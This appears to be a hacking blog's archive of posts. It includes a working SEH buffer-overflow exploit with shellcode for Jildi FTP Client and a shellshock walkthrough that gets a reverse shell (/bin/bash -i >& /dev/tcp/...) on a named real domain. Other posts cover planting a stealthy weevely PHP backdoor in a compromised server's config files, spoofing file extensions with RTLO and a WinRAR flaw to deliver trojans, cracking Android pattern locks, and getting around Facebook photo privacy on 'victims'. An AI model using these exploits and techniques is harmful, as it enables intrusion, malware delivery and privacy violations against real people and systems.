Wednesday, 3 June 2015

Jildi FTP Client 1.5.6 (SEH) BOF POC by Zahid Adeel

Jildi FTP Client (SEH) BOF

POC:

#!/usr/bin/python
#Author: Zahid Adeel
#Title: Jildi FTP Client 1.5.6 (SEH) BOF
#Version: 1.5.6 Build 1536
#Software Link: http://usfiles.brothersoft.com/internet/ftp/jildiftp.zip
#Tested on: WinXP Professional SP3
#Date: 2015-06-03


'''
How to test it:
Open jildi-poc.txt file and copy its content on clipboard. Then run Jildi FTP client, click on Connect icon and paste this string as server IP in text input field and click on connect. On successful execution, you will see calc.exe running on your system.
'''


fname="jildi-poc.txt"

junk = "A" * 10096
n_seh = "\xeb\x06\x90\x90"
ppr = "\x56\x0B\x01\x1B" # PPR in msjet40.dll

#run your calc.exe
shellcode=("\x89\xe5\xd9\xc2\xd9\x75\xf4\x5d\x55\x59\x49\x49\x49\x49\x43"
"\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56\x58\x34"
"\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41"
"\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58"
"\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x4b\x58\x4b\x39\x43\x30"
"\x45\x50\x43\x30\x45\x30\x4c\x49\x5a\x45\x56\x51\x49\x42\x52"
"\x44\x4c\x4b\x50\x52\x56\x50\x4c\x4b\x51\x42\x54\x4c\x4c\x4b"
"\x56\x32\x54\x54\x4c\x4b\x52\x52\x56\x48\x54\x4f\x4f\x47\x50"
"\x4a\x56\x46\x56\x51\x4b\x4f\x56\x51\x49\x50\x4e\x4c\x47\x4c"
"\x43\x51\x43\x4c\x54\x42\x56\x4c\x47\x50\x4f\x31\x58\x4f\x54"
"\x4d\x43\x31\x49\x57\x4b\x52\x4c\x30\x56\x32\x50\x57\x4c\x4b"
"\x56\x32\x52\x30\x4c\x4b\x51\x52\x47\x4c\x43\x31\x58\x50\x4c"
"\x4b\x51\x50\x43\x48\x4b\x35\x4f\x30\x54\x34\x51\x5a\x43\x31"
"\x4e\x30\x56\x30\x4c\x4b\x51\x58\x45\x48\x4c\x4b\x56\x38\x47"
"\x50\x43\x31\x49\x43\x5a\x43\x47\x4c\x47\x39\x4c\x4b\x56\x54"
"\x4c\x4b\x43\x31\x49\x46\x50\x31\x4b\x4f\x50\x31\x4f\x30\x4e"
"\x4c\x4f\x31\x58\x4f\x54\x4d\x45\x51\x58\x47\x50\x38\x4d\x30"
"\x54\x35\x4c\x34\x45\x53\x43\x4d\x4b\x48\x47\x4b\x43\x4d\x51"
"\x34\x52\x55\x4d\x32\x50\x58\x4c\x4b\x50\x58\x51\x34\x45\x51"
"\x49\x43\x52\x46\x4c\x4b\x54\x4c\x50\x4b\x4c\x4b\x56\x38\x45"
"\x4c\x43\x31\x4e\x33\x4c\x4b\x43\x34\x4c\x4b\x45\x51\x58\x50"
"\x4d\x59\x50\x44\x47\x54\x51\x34\x51\x4b\x51\x4b\x45\x31\x56"
"\x39\x50\x5a\x56\x31\x4b\x4f\x4b\x50\x51\x48\x51\x4f\x50\x5a"
"\x4c\x4b\x45\x42\x5a\x4b\x4d\x56\x51\x4d\x52\x4a\x45\x51\x4c"
"\x4d\x4b\x35\x4f\x49\x43\x30\x45\x50\x43\x30\x56\x30\x45\x38"
"\x56\x51\x4c\x4b\x52\x4f\x4c\x47\x4b\x4f\x4e\x35\x4f\x4b\x4b"
"\x4e\x54\x4e\x50\x32\x5a\x4a\x45\x38\x49\x36\x4d\x45\x4f\x4d"
"\x4d\x4d\x4b\x4f\x4e\x35\x47\x4c\x45\x56\x43\x4c\x45\x5a\x4d"
"\x50\x4b\x4b\x4b\x50\x54\x35\x54\x45\x4f\x4b\x50\x47\x54\x53"
"\x52\x52\x52\x4f\x43\x5a\x45\x50\x56\x33\x4b\x4f\x49\x45\x43"
"\x53\x45\x31\x52\x4c\x43\x53\x56\x4e\x45\x35\x54\x38\x45\x35"
"\x45\x50\x41\x41")

padding = "F" * (15000 - len(junk) -len(shellcode) - 8)
poc = junk + n_seh + ppr + shellcode + padding

fhandle = open(fname , 'wb')
fhandle.write(poc)
fhandle.close()
 

Wednesday, 15 April 2015

2015-CVE-1318 Leading To Privilege Escalation In Ubuntu Distros (Trusty, Utopic, Vivid)



Apport is a utility of Ubuntu which reports crash events of a user to bug track but who knew that a crash forwarding feature of this useful utility can lead to privilege escalation :D . I have confirmed this bug on Ubuntu Trusty (14.04) and i believe its worth sharing :)

Bug Explained:

A new feature was introduced in Ubuntu 14.04 which will forward any crash to another apport running in the task's namespace (in the case where the pid of the task in its namespace isn't equal to that in the host namespace).

This feature simply checks for the presence of /usr/share/apport/apport in the task's root directory. If it exists, it will chroot and exec the script.
The problem is that as apport is a coredump handler triggered by the kernel, it'll always run as real root, regardless of the crashed task's owner and namespace.
This therefore allows an unprivileged user to craft a specific filesystem structure, pivot_root to it, then crash a process inside it, causing apport outside of the namespace to execute a script as real root. By bind-mounting /proc from the host into that namespace, the unprivileged user can then access any file on the host as real root, causing the privilege escalation.

Severity (High):

A nobody user on a regular Ubuntu system can be root after successful exploitation.

Affected Distros:

  1. Ubuntu Trusty (14.04)
  2. Ubuntu Utopic (14.10)
  3. Ubuntu Vivid (15.04)

POC:

http://www.exploit-db.com/exploits/36746/

References:

https://bugs.launchpad.net/ubuntu/+source/apport/+bug/1438758
http://people.canonical.com/~ubuntu-security/cve/2015/CVE-2015-1318.html

Saturday, 27 September 2014

How to exploit a shellshock vulnerability to get a reverse shell

bash shellshock exploit

In this tutorial, i would show how to exploit a BASH Shellshock vulnerability successfully and getting a reverse shell while keeping ourself anonymous.

Who is vulnerable to shellshock??:

CGI scripts using bash variables or commands and CGI scripts written in bash can be exploited remotely. Moreoever, any service listeing on a port and using bash script or its variables in its coding can also be exploited using this vulnerability.

Requirements:

1- Shellshock vulnerable victim
2- Router or USB modem having port forwarding Feature
3- Download exploit for shellshock from here
4- Netcat
5- PHP

Google Dorks:

We can find our vulnerable victim using google dorks. Mostly, all cgi scripts written in bash uses a .sh file extension. So, following google dorks can given you good results.

inurl:/cgi-bin/ ext:sh
inurl:/cgi-bin/ ext:cgi

Vulnerable Victim:

In our tutorial victim is following domain:

http://supreme.adisseolabservice.com/cgi-bin/wslb.sh

Port Forwarding:

Open your router or usb modem settings and forward port 4444 for your LAN IP.

noip Domain for anonymity: 

This step is optional and it just provides a little bit more anonymity in our penetration testing scenario.
1- Visit noip.com and register an account.
2- Now go in your account and go in Manager Hosts. There add free domain name with your public IP.
This setting will take almost 1 minute to apply. After one minute you can ping your domain name and can verify that it is resolving to your public IP. Now we will use this domain name for our reverse shell.  
Here i have registerd a domain logon.myftp.org for getting a reverse shell.
So lets perform it.

/dev/tcp Linux Native Reverse Shell:

We will try to use the /dev/tcp for reverse shell because every linux system have it.

/bin/bash -i >& /dev/tcp/logon.myftp.org/4444 0>&1

OR

/bin/bash -i >& /dev/tcp/UR_PUBLIC_IP/4444 0>&1

NOTE: forward your port 4444 for your LAN IP otherwise it won't work for you.

Verification of vulnerable victim:

Open CMD and go in the directory where you downloaded the exploit from exploit-db.
Now type following command to run this exploit.
php bash_mod_cgi_script.php
It will show u an out saying that give me url and command.
So use the above given URL of victim and try to use any linux system command i.e. ls, whoami etc.
If you see command sent to server then it means server is receiving our command but it can't send back any response. 

shellshock vulnerable response

So, lets try to do a work around and get a reverse shell.

Netcat Reverse Shell Handler:

Now we need to run netcat listening on a port so that we may get a reverse shell.So, start a netcat listening on ur system with this command:
nc -lp 4444 -vv
-vv is used for verbosity and more information
-l is for listening with netcat
-p is used for a custom port on which we want to listen

Now we are all set, just run the following command and wait untill you receive a reverse shell on your netcat reverse handler.
php bash_mod_cgi_script.php -u http://supreme.adisseolabservice.com/cgi-bin/wslb.sh -c "/bin/bash -i >& /dev/tcp/logon.myftp.org/4444 0>&1"

Watch Video Tutorial:

Thursday, 14 August 2014

How To Crack The Android Gesture Pattern Lock

android gesture pattern cracked

In this tutorial I am going to demonstrate that how to crack the Gesture Pattern of ROOTED android devices.
This tutorial doesn't seem very effective in attacking some victim but it is good for those who want to try it on some android device after getting a metasploit meterpreter session.

How Gesture Pattern Lock Works??

Well first of all we need to understand that how gesture pattern works. Patterns are nothing but the path traced by the fingers on the nine circles with the number starting from 1 to 9 from top-left corner to the right bottom corner as shown in the figure below.

android gesture pattern

If we select a pattern 1478, the pattern would look like the following figure.

android gesture pattern keys
Gesture pattern is encrypted as a SHA-1 hash without a salt in gesture.key file at /data/system/gesture.key .

Tools Required:

1- ADB shell
2- ROOTED android device
3- Gesture Pattern SHA-1 dictionary and script to compare those hashes

1- First of all, enable usb debugging in your mobile's settings and connect your cell phone with your pc so that we may copy the gesture.key file for decryption purpose.

2- Download ADB shell from ADB official site and extract it on your drive. Open cmd, go to adb folder and execute the following command.

gesture key copied with adb shell

3- Now download the Gesture Pattern SHA-1 dictionary and python script from the above given links and extract those on your drive. Then execute the following command.


From the above image you can see the decrypted Gesture Pattern which is 14569.

NOTE:
This attack hardly takes 1-2 seconds as total number of possible patterns are only 9,85,825.

Monday, 4 August 2014

RTLO/RLO (right to left override) technique for file extension spoofing

RTLO/RLO (right to left override technique)

Salam everyone..!!
In this tutorial i will show you RTLO/RLO (right to left override) technique which is used for file extension spoofing.
This technique is used by many infamous malwares i.e GameOverZeus With this technique you can show your exe file as pdf, ppt, docx or whatever file extension you want to show to your victim.

Tools needed:

1- unicodeinput freeware utility
2- CFF explorer (to change icon of .NET exe file)

I am using winmd5 .NET file as a sample exe for demonstration purposes in this tutorial.

Brief intro: 

The RTLO/RLO character (U+202e in unicode) is designed to support languages that are written right to left, such as Arabic and Hebrew. The problem is that this override character also can be used to make a malicious file look innocuous. An increasing number of email based attacks are taking advantage of the RTLO/RLO character to trick users who have been trained to be wary of clicking on random .exe files.
For example consider the following file name
“winmd5exe.pdf”
It is encoded with RTLO/RLO unicode character. It looks like a pdf document but in fact it is an exe file in which we have placed a unicode character in its name right after winmd5 i.e winmd5[RTLO character]fdp.exe . After that RTLO unicode character file name will be read like this exe.pdf (from right to left character by character upto dot(.) symbol, means fdp will be inverted to pdf).
I hope you got my point. Similarly, you can use the following RTLO file name to run a batch file as pdf.
"winmd5[RTLO]fdp.bat" 

NOTE: Real content type of the file can be viewed from file properties.

Watch Video Tutorial:

Sunday, 4 May 2014

Winrar File Extension Spoofing 0day

winrar file extension spoofing oday

In March 2014, winrar file extension spoofing 0day was used wildly to hack many windows users.
In this tutorial, i will explain this vulnerability with some POC images and video created by my friend Gujjar-Haxor (Pak Cyber Pirates).

Vulnerability Description:

The file names showed in WinRAR when opening a ZIP file come from the central directory, but the file names used to extract and open contents come from the Local File Header. This inconsistency allows to spoof file names when opening ZIP files with WinRAR, which can be abused to execute arbitrary code. 

NOTE:

This tutorial is found working under windows 7 environment. For some reasons , it didn't work for my friends using windows 8. So, try it on win 7 if it doesn't work for you on win 8. Thanks.

POC:

1- Get a portable executable file. In this tutorial, i am using havij software which is an sql injection tool but you can use some trojan or RAT to infect the victim.

2- Right click on this exe file and click on "Add to archive". Choose ZIP archive format to compress this file into a ZIP archive.

3- Run Hex Editor , Hex workshop or any hex editor and open this compressed ZIP archive in it. Go to the end of hex editor and find havij.exe and rename its extension to jpg like this havij.jpg.

winrar zip file extesion spoofing


4- Now open this zip archive. You will see havij.jpg icon in the archive. When you will double click it, it will run that havij.exe file. 
(This is just a demonstration, you can use your own metasploit payload, trojan or RATs instead of this havij.exe file)

Watch Video Tutorial:


Saturday, 1 February 2014

How To Install Your Favorite Linux Distro And Pentesting Tools Over Android

run linux over android

Salam everyone, in this tutorial i am going to show you how to install your favorite Linux distro over rooted android devices.

Note:
Device Used For This Tutorial Is ROOTED Samsung Galaxy S3

Requirements:

  • Rooted Android Device
  • At least 4GB Disk Space
  • Linux Deploy
  • Wifi Connection

Steps:

1- Download and install Linux Deploy from android market.

2- Run Linux Deploy with super user permissions and tap the download icon to go to configuration page.

deploy linux configuration page

3- On configuration page, choose your favorite distro and its release. Choose a user name. If you won't edit username field then you will have default username which is "android".
Now move to the top of the page and tap the Install option to start the downloading.

installation of linux using deploy linux

4- Let the installation complete. On successful installation, you will see the following output.

installation of linux distro completed over linux deploy

5- Now tap the Start button to start your Linux distro.

linux running over deploy linux

6- Congrats ..!! now Linux is running over Linux Deploy console. So, now lets connect to it and test it.

Default Credentials:

Username:android
Password:changeme

How to Connect With Deploy Linux:

You can use following two method to use connect to your Linux Deploy machine.

Connect Using SSH Client:

1- Download any good ssh client to connect to your linux machine. I am using here JuiceSSH.

2- Use the above given default credentials and connect to your localhost. On successful connection, you will something like the following image.

ssh to deploy linux machine using juice ssh

Connect Using VNC Client:

1- Download any good VNC client and connect to your tightvncserver of Deploy Linux console. I am using here bVNC.

2- Use the default credentials and connect to your vnc server. On successful connection, output will appear like the following image.

bvnc client connected to linux deploy

Penetration Testing Tools:

I have tried the following four tools over this ubuntu-saucy environment and they worked like a charm.

Metasploit Exploitation Framework:

metasploit over android

system exploited using android metasploit

WPScan (Wordpress Vulnerability Scanner):

WPScan wordpress scanner over android

Sqlmap (SQL Injection Tool):

sqlmap sql injection tool over android

Nmap (Network Vulnerability Scanner):

nmap network vulnerability scanner over android

Remember me in your prayers and use your knowledge to benefit people.
(exploiter-z)

Sunday, 8 September 2013

How To Bypass Privacy Of Facebook Profile Picture


In this tutorial, i will show you that how to bypass Facebook privacy and watch full profile picture of any profile.
We have two methods to see full profile picture of our victim and both are given below.

1- By Editing Profile Picture URL
2- Thumbnail Zoom Plus Addon of Firefox

1- By Editing Profile Picture URL:

1- Open profile of the victim.
2- Right click on his/her profile picture and click on "copy image location".
3- Open new tab in your browser and paste the URL in it. URL will look something like this:
https://fbcdn-profile-a.akamaihd.net/hprofile-ak-prn2/c95.2.320.320/s160x160/XXXXXXXXXXXXXXXXXXXXXX.jpg
fb privacy bypass by editing image location

4- Now from that URL, we need to remove size parameters. In above URL, blue text is showing all sizing parameters. Remove them from URL and now your URL will become something like this:
https://fbcdn-profile-a.akamaihd.net/hprofile-ak-prn2/XXXXXXXXXXXXXXXXXXXXXX.jpg
5- Now just place this URL in your browser, press enter and enjoy full profile picture of your victim.

2- Thumbnail Zoom Plus Addon of Firefox:

In this method, you need Mozilla Firefox browser and its addon thumbnail zoom plus.
After getting these two things, follow me step by step:

1- Open Mozilla Firefox and browse to victim's profile.
2- Move your pointer over profile picture of victim, thumbnail zoom plus will pop-up full image of the victim in a new box.
fb privacy bypassing with thumbnail zoom plus
Note:
Sometimes, you won't be able to see full picture.
So, in that case:
1- Click over cover photo of victim.
2- Now when you are on the cover photo page, move your mouse over profile picture. It will show you enlarged image in a new box.

fb profile pic bypass using thumbnail zoom

Monday, 2 September 2013

How To Backdoor A WebServer Using Weevely PHP Backdoor

backdoor a server using weevely backdoor

In this tutorial, i will show you how to use weevely PHP backdoor to backdoor an apache webserver. You can use this method to backdoor any webserver running PHP on it.

Note:  
Weevely PHP backdoor is very stealthy. It will reside in the page that we will backdoor, but it will be hard to detect. Moreover password protection feature make it more secure from backdooring prospective.

First you need to install weevely on your machine.

Download weevely

Now if you are on Windows OS then follow my tutorial "How to install weevely web-backdoor tool on Windows". For linux users, its simple . Just download it and run it with python.

Now lets start backdooring procedure.

1- Open terminal or cmd and run weevely to verify that it working.

CMD: weevely.py
Terminal: ./weevely.py

Note: 
I will show this tutorial accoding to linux environment. Windows users must replace ./weevely.py with weevely.py to make it working in windows.

Output:
      ________                     __
     |  |  |  |----.----.-.--.----'  |--.--.
     |  |  |  | -__| -__| |  | -__|  |  |  |
     |________|____|____|___/|____|__|___  | v1.1
                                     |_____|
              Stealth tiny web shell

[+] Start ssh-like terminal session
    weevely <url> <password>

[+] Run command directly from command line
    weevely <url> <password> [ "<command> .." | :<module> .. ] 

[+] Restore a saved session file
    weevely session [ <file> ]

[+] Generate PHP backdoor
    weevely generate <password> [ <path> ] ..

[+] Show credits
    weevely credits
   
[+] Show available module and backdoor generators
    weevely help

2- Now run weevely generate command to generate a PHP backdoor.

./weevely.py generate exploiter_zee ~/Desktop/backdoor.php

Output:

[generate.php] Backdoor file '/home/exploiter/Desktop/backdoor.php' created with password 'exploiter_zee'

3- Now generated backdoor is available on our provided path. Open it with some text editor and copy all code of this backdoor.php. Now go back to your owned server and open some file that you want to backdoor. For example, i want to backdoor config.php, config.inc.php, connection.php etc. Now open each file and paste this code at the end or start of that PHP file.(I would recommend pasting at the end of file, because it will make your injected backdoor a little bit anonymous).

4- Now server is backdoored. Lets test it with our weevely tool. Open termial or cmd and connect to those backdoored files using following weevely command.

./weevely http://site.com/config.php exploiter_zee

Output:
      ________                     __
     |  |  |  |----.----.-.--.----'  |--.--.
     |  |  |  | -__| -__| |  | -__|  |  |  |
     |________|____|____|___/|____|__|___  | v1.1
                                     |_____|
              Stealth tiny web shell

[+] Browse filesystem, execute commands or list available modules with ':help'
[+] Current session: 'sessions/telekomxchange.net/config.session'

[shell.php] [!] Error: No response
hostan@:/home1/hostan/public_html $

Brief Explanation:
In above command we are trying to connect to config.php file that we just a moment ago backdoored and exploiter_zee is password of our backdoor. 

Saturday, 31 August 2013

How To Anonymize OS And Browser Details Using User-Agent Spoofing

What is User-Agent??:
User-Agent is often used for content negotiation, where the origin server selects suitable content or operating parameters for the response of client client's request. For example, the User-Agent string of visitor might be used by server to deliver the contents compatible with client's OS or browser.
User-Agent information is sent to server through HTTP-headers which tell server a lot about client's OS and browser version.

User-Agent String Format For Browers:
Most Web browsers use a User-Agent value as follows:  

Mozilla/[version] ([system and browser information]) [platform] ([platform details]) [extensions].  

For example, Safari on the iPad has used the following:
 
Mozilla/5.0 (iPad; U; CPU OS 3_2_1 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Mobile/7B405

The components of this string are as follows:

  • Mozilla/5.0: Previously used to indicate compatibility with the Mozilla rendering engine
  • (iPad; U; CPU OS 3_2_1 like Mac OS X; en-us): Details of the system in which the browser is running
  • AppleWebKit/531.21.10: The platform the browser uses
  • (KHTML, like Gecko): Browser platform details
  • Mobile/7B405: This is used by the browser to indicate specific enhancements that are available directly in the browser or through third parties. An example of this is Microsoft Live Meeting which registers an extension so that the Live Meeting service knows if the software is already installed, which means it can provide a streamlined experience to joining meetings.
Format for Automated Agents (Bots):
Automated web crawling tools can use a simplified form, where an important field is contact information in case of problems. By convention the word "bot" is included in the name of the agent. For example:
 Googlebot/2.1 (+http://www.google.com/bot.html) 
How Websites Detect Visitor's OS and Browser:
As I have shown in above user-agent string format for browser that OS and system information can be extracted from your visitor's user-agent string. You can see below your OS and Browser information.
Note: This detection is simple. So, Android OS will showed as Unix.


Countermeasures:
Well, how can we fool some site and give some bogus info . This thing can be done by user-agent spoofing. 

User-Agent Spoofing:
User-agent spoofing is a technique in which we replace user-agent string of our browser with a user-agent string of some other browser or Bot. In this tutorial, I will show user-agent spoofing method for Mozilla Firefox and Google Chrome. So lets start. 

User-Agent Spoofing In Firefox: 
To do user-agent spoofing in firefox, we will use an addon named user-agent switcher

Click here to install user-agent switcher in your firefox.

Now everything is ready, so now we only need a user-agent string to replace with our current user-agent string. You can get user-agent string of any browser from here.
1- Just copy user-agent string of any browser and open user-agent switcher addon of firefox. 
2- Then click on "Edit User Agents.." and there click on "New" which will open a drop down menu, there click on "New User Agent".
user-agent-switcher
3- Now click in user agent text field as showed in above image and replace this string with our newer user agent string. 
4- Add description to remember that which user agent string it is and click OK. 
5- This new user agent will appear in your user agents dialogue box. Now click on it and click OK. Now we are using this new user agent.
6- To check either new user-agent working or not, refresh your browser page and see either my tutorial is detecting your OS and browser or not.

User-Agent Spoofing In Google Chrome: 
For google chrome users, a google chrome extension if available named user-agent switcher which can be installed from here.
Its interface is easy to use so no more information need to be provided.
google chrome user agent switcher
Select any user agent from list, come on my site and check my site is detecting your OS and Brower version or not. Thanks for reading this tutorial. If you feel any trouble while following this tutorial then you may ask in comments.